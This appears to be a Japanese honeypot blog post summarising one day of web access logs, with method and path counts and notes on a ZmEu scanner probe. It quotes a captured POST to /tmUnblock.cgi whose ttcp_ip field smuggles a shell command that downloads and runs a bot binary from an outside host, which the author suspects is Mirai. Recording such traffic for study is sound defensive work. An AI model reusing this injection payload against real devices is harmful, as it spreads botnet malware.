遂に10日達成しました!ルーチンワークはスクリプト書いて、logもメールで受信できるため、無理なく続けれそうな気がしてます。
この10日間はメール発報スクリプトのメンテに時間割かれていたので、マルウェア解析等、できれば良いなと思います。
上記を書いた瞬間に正規表現でのパス取得におもらしに気付く・・はぁ
スクリプト修正しました。もう、、大丈夫なはず!!
2019-04-10のアクセス数は346件でした。
■送信元IPアドレスの数は 58件です。
■メソッドの一覧と件数は以下です。
method | 総数 – method |
CONNECT | 1 |
GET | 342 |
HEAD | 2 |
POST | 1 |
合計 結果 | 346 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 – method |
/ | GET | 49 |
/favicon.ico | GET | 3 |
/manager/html | GET | 284 |
/phpMyAdmin/ | GET | 2 |
/robots.txt | HEAD | 1 |
/tmUnblock.cgi | POST | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | GET | 1 |
http://112.124.42.80:63435/ | HEAD | 1 |
http://www.baidu.com/ | GET | 1 |
www.baidu.com:443 | CONNECT | 1 |
(空白) | GET | 2 |
気になるlog
-=-=309件目のlog=-=-
[2019-04-10 13:42:40+0900] 139.59.42.75 133.167.108.152:80 "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 200 False GET/w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1<br> Accept: <em>/</em><br> Accept-Language: en-us<br> Accept-Encoding: gzip, deflate<br> User-Agent: ZmEu<br> Host: 133.167.108.152<br> Connection: Close
気になったのはこの文字列”/w00tw00t.at.blackhats.romanian.anti-sec:)”
攻撃者が意図的に残す、footprintだとの事!
w00tw00t・・・とあるHackerが使っていたスラング?で”イェーイ”的な使い方?
romanian・・・ルーマニア人
User-AgentのZmEuは脆弱性スキャナーだそうで、phpMyAdminやSSHのブルートフォースの機能をもっているそう。ルーマニアで開発されたとのこと。
-=-=325件目のlog=-=-
[2019-04-10 18:13:23+0900] 24.192.52.230 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl.bot%3B+wget+http%3A%2F%2Flove.thotiana.live%2Fbins%2Fmpsl.bot%3B+chmod+777+mpsl.bot%3B+.%2Fmpsl.bot+s1%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
マルウェアのダウンロード。おそらくmirai。